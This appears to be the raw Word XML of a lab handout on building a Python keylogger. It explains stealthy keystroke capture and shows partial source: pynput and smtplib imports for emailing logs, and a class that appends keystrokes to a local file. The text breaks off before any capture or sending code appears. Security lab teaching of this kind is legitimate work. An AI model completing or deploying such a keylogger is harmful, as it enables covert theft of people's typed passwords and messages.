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122FAF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E7F36D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating Keylogger using python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C8EFF5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keylogger :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050B5240">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A keylogger (keystroke logger) is a type of surveillance software or hardware that records every keystroke made on a computer keyboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F785F5A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FD25D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Working of Keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2501BFCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intercept keystrokes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF9563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Store captured data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114DAEEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Operate stealthily</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E595504">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4537B905">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now we will look at the analogy of the code of keylogger and understands how it works then we will run the keylogger and then check the performance of the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A46FE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Firstly we have to import libraries that are the main part of the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779CA3BA">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import pynput.keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF8FBDD">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import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6441BDFB">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import smtplib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E9E347">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from email.mime.text import MIMEText</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAF9255">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from email.mime.multipart import MIMEMultipart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427B7028">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from datetime import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB67DE6">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B06BCB">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pynput.keyboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : main libarary to capture keystrokes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FCDD54">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Threading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  : For multitasking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAD398A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Smtplib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : for sending emails with logs data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21057629">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Email.mime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : used for creating properly format of messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106A489D">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Datetime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : used for timestamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F019DDC">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BDDA81">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class AdvancedKeylogger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE58651">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def __init__(self, time_interval=60, log_file="keylog.txt"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A90EA8D">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self.log_file = log_file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688DB208">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self.interval = time_interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ACE5B5">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self.is_running = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0680AC44">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0776735F">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with open(self.log_file, "a", encoding="utf-8") as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267ADFBB">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file.write(f"\n{'='*50}\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FB5D0D">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file.write(f"Keylogger Started: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A0988">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file.write(f"{'='*50}\n\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E0E2AA">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1E0696">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>log_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:Name to save the file of kylogger </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C00BF3">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>time_interval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:to add checkpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1351A532">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is_running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: control to stop the keylogger </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF4AA1C">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B948D4B">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def append_to_log(self, string):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE0FE45">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with open(self.log_file, "a", encoding="utf-8") as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C9BB42">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file.write(string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5643BA9C">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D26B2C">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485E3D72">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>File Handling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:to add new content without deleting old one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB90EEA">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:To capture special characters and symbols of the keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055F7444">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Real-time Writing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: To save each keystroke suddenly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF978BD">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F1A7CD">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
